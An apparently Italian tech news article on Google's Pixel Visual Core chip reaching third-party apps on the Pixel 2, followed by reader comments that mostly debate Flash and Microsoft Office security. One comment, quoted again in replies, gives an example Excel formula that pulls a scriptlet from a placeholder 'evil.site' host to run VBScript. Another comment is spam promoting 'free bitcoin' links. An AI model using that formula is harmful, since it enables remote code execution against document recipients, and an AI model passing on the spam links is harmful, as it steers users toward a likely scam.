Scatti fotografici al top con Pixel 2

Google introduce pieno supporto alla sua tecnologia Visual Core nei Pixel 2. Con le App di casa Facebook e Snapchat, da oggi sarà possibile scattare foto di qualità superiore risparmiando batteria

Roma – La tecnologia Visual Core presentata da Google ad ottobre atterra su applicazioni di terzi. Il chipset proprietario dedicato all’elaborazione fotografica si appresta oggi ad essere ospitato negli smartphone di nuova generazione Pixel 2 , e in particolare nelle App Instagram, WhatsApp, Facebook e Snapchat a bordo. Grazie a questa implementazione gli utilizzatori di queste app trarranno beneficio contando sull’abilitazione HDR+ (che riduce il rumore), su minor consumo rispetto al processore principale a cui attinge l’applicazione (il chip “macina” 3 trilioni di operazioni al secondo). Nella beta di Android 8.1 a dicembre era già stata inserita una preview per gli sviluppatori.

Pixel

Si tratta di un’operazione inusuale per Google. Sia lo sviluppo del chipset, che per volontà della stessa Google è avvenuto contando sul suo team di progettazione e sviluppo piuttosto che affidarsi a terzi. Ma il lungo tempo trascorso per coinvolgere i partner Facebook e Snapchat è anch’esso insolito . A confermare che si tratta di un percorso inedito è anche Ofer Shacham, ingegnere senior di Google: “È la prima volta. Volevamo assicurarci che si sviluppasse in modo pulito e gradevole. Volevamo lavorare con i nostri partner e non sorprenderli. Volevamo essere sicuri di migliorare su tutti gli aspetti, non solo sulla qualità dell’immagine, ma anche delle prestazioni e della potenza. Ecco perché abbiamo lanciato Pixel Visual Core solo per sviluppatori a novembre, e ora stiamo migliorando continuamente. Vogliamo assicurarci che il nostro telefono continui a migliorare con il tempo”.

Sembra quindi che la strada scelta da Google sia di sviluppare la soluzione in casa dedicandoci il massimo impegno. Ciò lascerebbe intravedere un ulteriore sforzo commerciale per quanto concerne il settore della telefonia, su cui da qualche anno l’azienda cerca di dire la sua (ricordate i Nexus ?).

I possessori di Pixel 2 beneficeranno della novità a partire dal prossimo aggiornamento previsto tra qualche giorno. Ancora non si sa invece quando la tecnologia sarà resa disponibile anche per i possessori di dispositivi diversi. Attualmente secondo i test di DxOMark Pixel 2 si è meritato il miglior ranking per quanto concerne la qualità delle foto scattate . E siamo solo all’inizio.

Mirko Zago
fonte immagine

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • Ali scrive:
    Come ottenere bitcoin gratis
    Per chi è interessato a guadagnare bitcoin gratis consiglio l'utilizzo di questo sito:https://tinyurl.com/ottienibitcoinoraSi può guadagnare fino a 0.02749128 BTC (200!) ogni ora. Inoltre ai primi tre che si registrano con il link qui sopra manderò un bonus di 0.001 bitcoin. Il sito è molto affidabile, uno dei più famosi nel suo settore.Inoltre consiglio anche questo sito, simile al precedente ma con il quale è possibile ottenere dogecoin, una criptovaluta simile ai bitcoin che sta avendo molto sucXXXXX:https://tinyurl.com/ottienidogecoinoraPer entrambi i siti è sufficiente registrarsi e cliccare sul pulsante "ROLL!" ogni ora per ottenere i bitcoin.
  • bubba scrive:
    spettacolo!
    il t1000 e' piu rinXXXXXXXXto di maxsix e alfonso messi insieme... :( vien voglia di andare a postare su ruttolibero.it
  • Domanda scrive:
    WinX
    Ma flash l'hanno imposto nel sistema come hanno fatto con Win 8?
  • addobbato scrive:
    Adobe Flash
    Adobe Flash[img]http://3.bp.blogspot.com/-Ixn8O9K7MJk/TtMziELOrbI/AAAAAAAAiuI/XbMB53xKPo4/w1200-h630-p-k-no-nu/%25CE%25BA%25CE%25BF%25CF%2581%25CF%2585%25CF%2586%25CE%25B1%25CE%25AF%25CE%25BF+%25CE%25B1%25CE%25BD%25CE%25AD%25CE%25BA%25CE%25B4%25CE%25BF%25CF%2584%25CE%25BF.jpg[/img]
  • e22516d1a7e scrive:
    Errore nell'articolo
    C'è un errore nell'articolo, parlano di una vulnerabilità Flash, ma non è solo quello. Flash sta morendo, la vulnerabilità peggiore rimane:https://support.office.com/en-us/article/insert-an-object-in-your-excel-spreadsheet-e73867b2-2988-4116-8d85-f5769ea435ba
    • bubba scrive:
      Re: Errore nell'articolo
      - Scritto da: e22516d1a7e
      C'è un errore nell'articolo, parlano di una
      vulnerabilità Flash, ma non è solo quello. Flash
      sta morendo, la vulnerabilità peggiore
      rimane:

      https://support.office.com/en-us/article/insert-anecco, hai centrato il problema. 20 anni e ancora M$ permette una vagonata di XXXXX embeddabile nei doc office. Ma tenere un LIMITATO linguaggio di scripting INTERNO+sandboxed e BASTA non e' proprio possibile? :P
      • f0c5a7e78a8 scrive:
        Re: Errore nell'articolo

        ecco, hai centrato il problema. 20 anni e ancora
        M$ permette una vagonata di XXXXX embeddabile nei
        doc office. Ma tenere un LIMITATO linguaggio di
        scripting INTERNO+sandboxed e BASTA non e'
        proprio possibile?Non è tanto questione di limitare alla sandbox. Un documento che contiene riferimenti ad un altro documento è normale. Un doc con un link ad un altro doc o a un pdf in ufficio si puo capire. Un link ad una immagine si puo tollerare, permettere di linkare file di qualunque tipo è criticabile. Ma l'errore peggiore è l'apertura automatica del file all'apertura del documento senza permettere all'utente di verificare il link. Chi ha deciso una cosa del genere è un incompetente ed un delinquente, la cosa peggiore è che se a distanza di anni ancora non hanno cambiato il funzionamento vuol dire che sono in tanti ad apprezzare un'idea tanto idiota. Pure il mio mail client quando mostra una email non carica le immagini linkate di default.
        • f0c5a7e78a8 scrive:
          Re: Errore nell'articolo

          Pure il mio mail
          client quando mostra una email non carica le
          immagini linkate di default.E mostra i link completi senza nascondere niente.
        • bubba scrive:
          Re: Errore nell'articolo
          - Scritto da: f0c5a7e78a8

          ecco, hai centrato il problema. 20 anni e ancora

          M$ permette una vagonata di XXXXX embeddabile
          nei

          doc office. Ma tenere un LIMITATO linguaggio di

          scripting INTERNO+sandboxed e BASTA non e'

          proprio possibile?

          Non è tanto questione di limitare alla sandbox.
          Un documento che contiene riferimenti ad un altro
          documento è normale. dipende cosa si intende per riferimenti
          Un doc con un link ad un
          altro doc o a un pdf in ufficio si puo capire. Un
          link ad una immagine si puo tollerarema certo.. quando per un link si intende una comune riga di testo, che il viewer in questione (word, excel, ecc) semplicemente la evidenzia di diverso colore, e invoca, se clickato, il default browser. E basta., permettere
          di linkare file di qualunque tipo è criticabile.
          Ma l'errore peggiore è l'apertura automatica del
          file all'apertura del documento senza permettere
          all'utente di verificare il link. Chi ha decisomhh non sono sicuro che tu abbia capito a cosa mi sto riferendo (visto che non hai capito cosa intendevo per interno-sandboxed )Il CANCRO che ci si porta appresso da 20 anni e' OLE ..che come dice il nome 'Object Linking and Embedding' e' un nefasto meccanismo di interoperatibilita/oggetti/plugin installati ovunque nell'OS che fornirebbero 'rich documentation feature' a office. gli OLE sono basati su COM (altri oggetti blabla). Anche ActiveX e' un COM e anche lui blabla. Che diamine sono tutti sti cosi? dei PROGRAMMI. Grazie a ste genialate ricorsive si possono includere programmi dentro programmi nei documenti, invocare programmi, ecc ecc. "Ortogonalmente" c'e' la faccenda degli scripting language & interpreti... M$ ha la mania dei linguaggi buttati a cazzus cscript, wscript, hta, chm , vba, vbscript, jscript... TUTTA questa roba dovrebbe essere buttata nel XXXXX. Le macro dovrebbero essere composte da un linguaggio di script interno, che si preoccupa di celle, caratteri bold, sorting, e amenita' del genere. E BASTA.Invece da secoli, l'approccio e' "consigliamo di non prelevare file doc da internet" (come dire: mangiate solo a casa vostra. fuori potreste avvelenarvi) ,mettere workaround tipo "macro disabilitate di default", e fixare bug nella vagonata di OCX, DLL e affini man mano che si scoprono.Un approccio utile solo per il cybercrime :P
          • panda rossa scrive:
            Re: Errore nell'articolo
            - Scritto da: bubba
            Invece da secoli, l'approccio e' "consigliamo di
            non prelevare file doc da internet" (come dire:
            mangiate solo a casa vostra. fuori potreste
            avvelenarvi) ,mettere workaround tipo "macro
            disabilitate di default", e fixare bug nella
            vagonata di OCX, DLL e affini man mano che si
            scoprono.
            Un approccio utile solo per il cybercrime :PCon il risultato che quando sviluppi una macro per il cliente, il cliente si rifiuta di usarla perche' il suo sistema ha le macro disabilitate e fa apparire un messaggio che dice: "Orrore! Il documento che stai per aprire contiene una macro che potrebbe farti venire una brutta malattia sessualmente trasmissibile!"Quando poi lo stesso sistema e' infestato dai peggio virus perche' il tizio naviga solo con IE.
          • f0c5a7e78a8 scrive:
            Re: Errore nell'articolo


            Un documento che contiene riferimenti ad un
            altro

            documento è normale.
            dipende cosa si intende per riferimenti
            Intendo solo il classico "referenced documents" come quando scrivi un'analisi di dettaglio e metti il link al documento dei requisiti.

            , permettere

            di linkare file di qualunque tipo è criticabile.

            Ma l'errore peggiore è l'apertura automatica del

            file all'apertura del documento senza permettere

            all'utente di verificare il link. Chi ha deciso
            mhh non sono sicuro che tu abbia capito a cosa mi
            sto riferendo (visto che non hai capito cosa
            intendevo per interno-sandboxed
            )
            Il CANCRO che ci si porta appresso da 20 anni e'
            OLE ..che come dice il nome 'Object Linking and
            Embedding' e' un nefasto meccanismo di
            interoperatibilita/oggetti/plugin installati
            ovunque nell'OS che fornirebbero 'rich
            documentation feature' a office. gli OLE sono
            basati su COM (altri oggetti blabla). Anche
            ActiveX e' un COM e anche lui blabla. Che diamine
            sono tutti sti cosi? dei PROGRAMMI. Grazie a ste
            genialate ricorsive si possono includere
            programmi dentro programmi nei documenti,
            invocare programmi, ecc ecc. "Ortogonalmente"
            c'e' la faccenda degli scripting language &
            interpreti... M$ ha la mania dei linguaggi
            buttati a cazzus cscript, wscript, hta, chm ,
            vba, vbscript, jscript...

            TUTTA questa roba dovrebbe essere buttata nel
            XXXXX. Le macro dovrebbero essere composte da un
            linguaggio di script interno, che si preoccupa di
            celle, caratteri bold, sorting, e amenita' del
            genere. E
            BASTA.Su questo sono d'accordo, è un cancro. Ma è peggio di quello di cui mi riferivo all'inizio. Vedo questa roba come vulnerabilità ad alto rischio su cui si puo convincere gli utenti a stare attenti (abbiamo una marea di excel con macro in VB usate dagli analisti finanziari e capiscono il rischio). Quello che dicevo all'inizio anche rischi apparentemente minori come un link ad un file esterno non eseguibile contiene sempre una vulnerabilità. Sono cose che spingono gli utenti a sottovalutare certi rischi.
            Invece da secoli, l'approccio e' "consigliamo di
            non prelevare file doc da internet" (come dire:
            mangiate solo a casa vostra. fuori potreste
            avvelenarvi) ,mettere workaround tipo "macro
            disabilitate di default", e fixare bug nella
            vagonata di OCX, DLL e affini man mano che si
            scoprono.
            Un approccio utile solo per il cybercrime :PConcordo.
          • bubba scrive:
            Re: Errore nell'articolo
            - Scritto da: f0c5a7e78a8


            Un documento che contiene riferimenti
            ad
            un

            altro


            documento è normale.

            dipende cosa si intende per riferimenti



            Intendo solo il classico "referenced documents"
            come quando scrivi un'analisi di dettaglio e
            metti il link al documento dei
            requisiti.



            , permettere


            di linkare file di qualunque tipo è
            criticabile.


            Ma l'errore peggiore è l'apertura
            automatica
            del


            file all'apertura del documento senza
            permettere


            all'utente di verificare il link. Chi
            ha
            deciso

            mhh non sono sicuro che tu abbia capito a
            cosa
            mi

            sto riferendo (visto che non hai capito cosa

            intendevo per interno-sandboxed

            )

            Il CANCRO che ci si porta appresso da 20
            anni
            e'

            OLE ..che come dice il nome 'Object Linking
            and

            Embedding' e' un nefasto meccanismo di

            interoperatibilita/oggetti/plugin installati

            ovunque nell'OS che fornirebbero 'rich

            documentation feature' a office. gli OLE sono

            basati su COM (altri oggetti blabla). Anche

            ActiveX e' un COM e anche lui blabla. Che
            diamine

            sono tutti sti cosi? dei PROGRAMMI. Grazie a
            ste

            genialate ricorsive si possono includere

            programmi dentro programmi nei documenti,

            invocare programmi, ecc ecc. "Ortogonalmente"

            c'e' la faccenda degli scripting language &

            interpreti... M$ ha la mania dei linguaggi

            buttati a cazzus cscript, wscript, hta, chm
            ,

            vba, vbscript, jscript...



            TUTTA questa roba dovrebbe essere buttata nel

            XXXXX. Le macro dovrebbero essere composte
            da
            un

            linguaggio di script interno, che si
            preoccupa
            di

            celle, caratteri bold, sorting, e amenita'
            del

            genere. E

            BASTA.

            Su questo sono d'accordo, è un cancro. Ma è
            peggio di quello di cui mi riferivo all'inizio.
            Vedo questa roba come vulnerabilità ad alto
            rischio su cui si puo convincere gli utenti a
            stare attenti (abbiamo una marea di excel con
            macro in VB usate dagli analisti finanziari e
            capiscono il rischio).no, non credo.. non davvero. visto che hai nominato referenced doc... conosci la feature dei workbooks external links ? e' proprio una cagata di office che dovrebbe permettere all'autore di condividere un doc di office con references collegate a risorse esterne e non embedded.Scatta subito quando apri il documento.. si, esce un popup.. ma del tutto diverso da quello della macro.. potrebbe sembrare un aggiornamento/intergrazione legittimo.Grazie all'eccellente XXXXX OLE+script un semplice link inserito scatena l'inferno ("semplice".. da vedere e' semplice e innoquo..) In excel sarebbe una roba tipo =Package|scRiPt:http://evil.site/roba.xml! ... cos'e' sta zozzeria xml? e' un M$ scriptlet ... un wrapper a COM object ,che per es ('script:) , invoca ed esegue uno VBScriptLa XXXXX M$ e' troppo piena di insidie. OLE e linguaggi di scripting esterni andrebbero sempicemente eradicati.
            Quello che dicevo all'inizio anche rischi
            apparentemente minori come un link ad un file
            esterno non eseguibile contiene sempre una
            vulnerabilità. Sono cose che spingono gli utenti
            a sottovalutare certi
            rischi.
          • Wallestein scrive:
            Re: Errore nell'articolo
            - Scritto da: bubba
            - Scritto da: f0c5a7e78a8



            Un documento che contiene riferimenti

            ad

            un


            altro



            documento è normale.


            dipende cosa si intende per riferimenti






            Intendo solo il classico "referenced documents"

            come quando scrivi un'analisi di dettaglio e

            metti il link al documento dei

            requisiti.





            , permettere



            di linkare file di qualunque tipo è

            criticabile.



            Ma l'errore peggiore è l'apertura

            automatica

            del



            file all'apertura del documento senza

            permettere



            all'utente di verificare il link. Chi

            ha

            deciso


            mhh non sono sicuro che tu abbia capito a

            cosa

            mi


            sto riferendo (visto che non hai capito
            cosa


            intendevo per interno-sandboxed


            )


            Il CANCRO che ci si porta appresso da 20

            anni

            e'


            OLE ..che come dice il nome 'Object Linking

            and


            Embedding' e' un nefasto meccanismo di


            interoperatibilita/oggetti/plugin
            installati


            ovunque nell'OS che fornirebbero 'rich


            documentation feature' a office. gli OLE
            sono


            basati su COM (altri oggetti blabla). Anche


            ActiveX e' un COM e anche lui blabla. Che

            diamine


            sono tutti sti cosi? dei PROGRAMMI. Grazie
            a

            ste


            genialate ricorsive si possono includere


            programmi dentro programmi nei documenti,


            invocare programmi, ecc ecc.
            "Ortogonalmente"


            c'e' la faccenda degli scripting language &


            interpreti... M$ ha la mania dei linguaggi


            buttati a cazzus cscript, wscript, hta,
            chm

            ,


            vba, vbscript, jscript...





            TUTTA questa roba dovrebbe essere buttata
            nel


            XXXXX. Le macro dovrebbero essere composte

            da

            un


            linguaggio di script interno, che si

            preoccupa

            di


            celle, caratteri bold, sorting, e amenita'

            del


            genere. E


            BASTA.



            Su questo sono d'accordo, è un cancro. Ma è

            peggio di quello di cui mi riferivo all'inizio.

            Vedo questa roba come vulnerabilità ad alto

            rischio su cui si puo convincere gli utenti a

            stare attenti (abbiamo una marea di excel con

            macro in VB usate dagli analisti finanziari e

            capiscono il rischio).
            no, non credo.. non davvero. visto che hai
            nominato referenced doc... conosci la feature dei
            workbooks external links ? e' proprio una cagata
            di office che dovrebbe permettere all'autore di
            condividere un doc di office con references
            collegate a risorse esterne e non
            embedded.
            Scatta subito quando apri il documento.. si, esce
            un popup.. ma del tutto diverso da quello della
            macro.. potrebbe sembrare un
            aggiornamento/intergrazione
            legittimo.
            Grazie all'eccellente XXXXX OLE+script un
            semplice link inserito scatena l'inferno
            ("semplice".. da vedere e' semplice e innoquo..)
            In excel sarebbe una roba tipo
            =Package|scRiPt:http://evil.site/roba.xml!
            ... cos'e' sta zozzeria xml? e' un M$ scriptlet
            ... un wrapper a COM object ,che per es
            ('script:) , invoca ed esegue uno
            VBScript

            La XXXXX M$ e' troppo piena di insidie. OLE e
            linguaggi di scripting esterni andrebbero
            sempicemente
            eradicati.


            Quello che dicevo all'inizio anche rischi

            apparentemente minori come un link ad un file

            esterno non eseguibile contiene sempre una

            vulnerabilità. Sono cose che spingono gli utenti

            a sottovalutare certi

            rischi.Perchè la grandissima idea di poter linkare programmi nell' help in linea, mica può venire in mente ai comuni mortali, ci vogliono fior fiori di zucconi per ideare quel genere di cose.
          • panda rossa scrive:
            Re: Errore nell'articolo
            - Scritto da: Wallestein
            Perchè la grandissima idea di poter linkare
            programmi nell' help in linea, mica può venire in
            mente ai comuni mortali, ci vogliono fior fiori
            di zucconi per ideare quel genere di
            cose.Windows era nato come sistema monoutente stand alone e offline.E' rimasto concettualmente un sistema monoutente stand alone e offline anche se nel frattempo hanno aggiunto multitasking, multiutenza, collegamento alla rete, etc...Praticamente e' una architettura pensata per far proliferare il malware.
          • bubba scrive:
            Re: Errore nell'articolo
            - Scritto da: Wallestein
            - Scritto da: bubba

            - Scritto da: f0c5a7e78a8




            Un documento che contiene
            riferimenti


            ad


            un



            altro




            documento è normale.



            dipende cosa si intende per riferimenti









            Intendo solo il classico "referenced
            documents"


            come quando scrivi un'analisi di dettaglio e


            metti il link al documento dei


            requisiti.







            , permettere




            di linkare file di qualunque tipo è


            criticabile.




            Ma l'errore peggiore è l'apertura


            automatica


            del




            file all'apertura del documento
            senza


            permettere




            all'utente di verificare il link.
            Chi


            ha


            deciso



            mhh non sono sicuro che tu abbia capito a


            cosa


            mi



            sto riferendo (visto che non hai capito

            cosa



            intendevo per interno-sandboxed



            )



            Il CANCRO che ci si porta appresso da 20


            anni


            e'



            OLE ..che come dice il nome 'Object
            Linking


            and



            Embedding' e' un nefasto meccanismo di



            interoperatibilita/oggetti/plugin

            installati



            ovunque nell'OS che fornirebbero 'rich



            documentation feature' a office. gli OLE

            sono



            basati su COM (altri oggetti blabla).
            Anche



            ActiveX e' un COM e anche lui blabla. Che


            diamine



            sono tutti sti cosi? dei PROGRAMMI.
            Grazie

            a


            ste



            genialate ricorsive si possono includere



            programmi dentro programmi nei documenti,



            invocare programmi, ecc ecc.

            "Ortogonalmente"



            c'e' la faccenda degli scripting
            language
            &



            interpreti... M$ ha la mania dei
            linguaggi



            buttati a cazzus cscript, wscript, hta,

            chm


            ,



            vba, vbscript, jscript...







            TUTTA questa roba dovrebbe essere buttata

            nel



            XXXXX. Le macro dovrebbero essere
            composte


            da


            un



            linguaggio di script interno, che si


            preoccupa


            di



            celle, caratteri bold, sorting, e
            amenita'


            del



            genere. E



            BASTA.





            Su questo sono d'accordo, è un cancro. Ma è


            peggio di quello di cui mi riferivo
            all'inizio.


            Vedo questa roba come vulnerabilità ad alto


            rischio su cui si puo convincere gli utenti a


            stare attenti (abbiamo una marea di excel con


            macro in VB usate dagli analisti finanziari e


            capiscono il rischio).

            no, non credo.. non davvero. visto che hai

            nominato referenced doc... conosci la feature
            dei

            workbooks external links ? e' proprio una
            cagata

            di office che dovrebbe permettere all'autore di

            condividere un doc di office con references

            collegate a risorse esterne e non

            embedded.

            Scatta subito quando apri il documento.. si,
            esce

            un popup.. ma del tutto diverso da quello della

            macro.. potrebbe sembrare un

            aggiornamento/intergrazione

            legittimo.

            Grazie all'eccellente XXXXX OLE+script un

            semplice link inserito scatena l'inferno

            ("semplice".. da vedere e' semplice e
            innoquo..)


            In excel sarebbe una roba tipo

            =Package|scRiPt:http://evil.site/roba.xml!

            ... cos'e' sta zozzeria xml? e' un M$ scriptlet

            ... un wrapper a COM object ,che per es

            ('script:) , invoca ed esegue uno

            VBScript



            La XXXXX M$ e' troppo piena di insidie. OLE e

            linguaggi di scripting esterni andrebbero

            sempicemente

            eradicati.




            Quello che dicevo all'inizio anche rischi


            apparentemente minori come un link ad un file


            esterno non eseguibile contiene sempre una


            vulnerabilità. Sono cose che spingono gli
            utenti


            a sottovalutare certi


            rischi.

            Perchè la grandissima idea di poter linkare
            programmi nell' help in linea, mica può venire in
            mente ai comuni mortali, ci vogliono fior fiori
            di zucconi per ideare quel genere di
            cose.si non c'e' niente da fare... era una idea bislacca del 1990... li' forse ci poteva stare. Con l'idea di dominare internet (rememner MS Network di w95? e tutte le robe anti-W3C di IE?) hanno inserito-integrato sta XXXXX ancora di piu. Bene. Ci sta. Pero' la partita l'hai persa, il vento e' cambiato... Pero' l'idea zozza non l'hanno mai abbandonata. Era da fare almeno da DIECI anni (visti i danni provocati).
  • incredibile scrive:
    2018 si parla ancora di flash player
    I winari hanno un cassonetto della monnezza al posto del cervello.Non solo installano flash per vedere i pronnazzi. No, non è abbastanza! Aprono alla XXXXX gli allegati office (excel). Ah, office una delle mer d aviglie di widows e macacos.Ovviamente l' account utente è nel gruppo Administrators nove volte su dieci, per "comodità". Limitare i permessi è cosa da sfigati secondo loro.Eh si. Se ne parlerà ancora tanto di flash considerata la scaltrezza della base utenti di widows.
    • bubba scrive:
      Re: 2018 si parla ancora di flash player
      - Scritto da: incredibile
      I winari hanno un cassonetto della monnezza al
      posto del
      cervello.

      Non solo installano flash per vedere i pronnazzi.
      No, non è abbastanza! Aprono alla XXXXX gli
      allegati office (excel). Ah, office una delle
      mer d aviglie di widows e
      macacos.nessuno dei due e' il VERO problema. il PROBLEMA e' la quantita infinita di XXXXX che si puo' embeddare nei doc office. una roba che si trascina da 20anni (solo che 20 anni fa nessuno usava internet)
    • whip scrive:
      Re: 2018 si parla ancora di flash player
      - Scritto da: incredibile
      Non solo installano flash per vedere i pronnazzi....che son stati fra i primi a poterne fare a meno. Ma per il winaro medio c'è questo feticismo per la roba bacata e ogni malware e falla extra è un orgasmo.
  • peloso scrive:
    perche' ce lo teniamo?
    e' mai possibile che ancora non ci si riesca a liberare di questa iattura?perche le alternative non hanno il sopravvento? giusto per capire..
    • panda rossa scrive:
      Re: perche' ce lo teniamo?
      - Scritto da: peloso
      e' mai possibile che ancora non ci si riesca a
      liberare di questa
      iattura?
      perche le alternative non hanno il sopravvento?
      giusto per
      capire..Quale medico ti ha prescritto di tenere flash?
      • Wallestain scrive:
        Re: perche' ce lo teniamo?
        - Scritto da: panda rossa
        - Scritto da: peloso

        e' mai possibile che ancora non ci si riesca a

        liberare di questa

        iattura?

        perche le alternative non hanno il sopravvento?

        giusto per

        capire..


        Quale medico ti ha prescritto di tenere flash?I giochini per sfigati, e i pornazzi quelli più di nicchia, e li che gli sXXXXXccioni trovano i loro 'gusticini' preferiti.Ah, non dimentichiamo interfacce crate con tutto l'ambaradan di addobe, flex e dura lex! E gli script in action script per poposhoppo, ecc, ecc. (rotfl)
        • panda rossa scrive:
          Re: perche' ce lo teniamo?
          - Scritto da: Wallestain
          - Scritto da: panda rossa

          - Scritto da: peloso


          e' mai possibile che ancora non ci si riesca a


          liberare di questa


          iattura?


          perche le alternative non hanno il
          sopravvento?


          giusto per


          capire..





          Quale medico ti ha prescritto di tenere flash?

          I giochini per sfigati, e i pornazzi quelli più
          di nicchia, e li che gli sXXXXXccioni trovano i
          loro 'gusticini'
          preferiti.E allora che si pigliassero il cetriolo.A noi che ci frega, scusa?
          Ah, non dimentichiamo interfacce crate con tutto
          l'ambaradan di addobe, flex e dura lex! E gli
          script in action script per poposhoppo, ecc, ecc.
          (rotfl)Quasi stanno meglio quelli che lo usano per i pornazzi gay.
        • iRoby scrive:
          Re: perche' ce lo teniamo?
          Insomma sempre di roba per Windows si parla?
          • panda rossa scrive:
            Re: perche' ce lo teniamo?
            - Scritto da: iRoby
            Insomma sempre di roba per Windows si parla?E che vuoi farci?C'erano belle notizie, come il lancio della Tesla in orbita, senza una sola riga di codice closed, ma hanno preferito la solita minestra riscaldata.
          • Wallestein scrive:
            Re: perche' ce lo teniamo?
            - Scritto da: iRoby
            Insomma sempre di roba per Windows si parla?da quelli lì arriva l'elemosina che dà da mangiare al marrun.
    • Wallestein scrive:
      Re: perche' ce lo teniamo?
      - Scritto da: peloso
      e' mai possibile che ancora non ci si riesca a
      liberare di questa
      iattura?
      perche le alternative non hanno il sopravvento?
      giusto per
      capire..Ti stanno promettendo che se usi lo spione non ci saranno più questi problemi. USATE winX lo spione.Per essere tutti più siculi! (rotfl)
Chiudi i commenti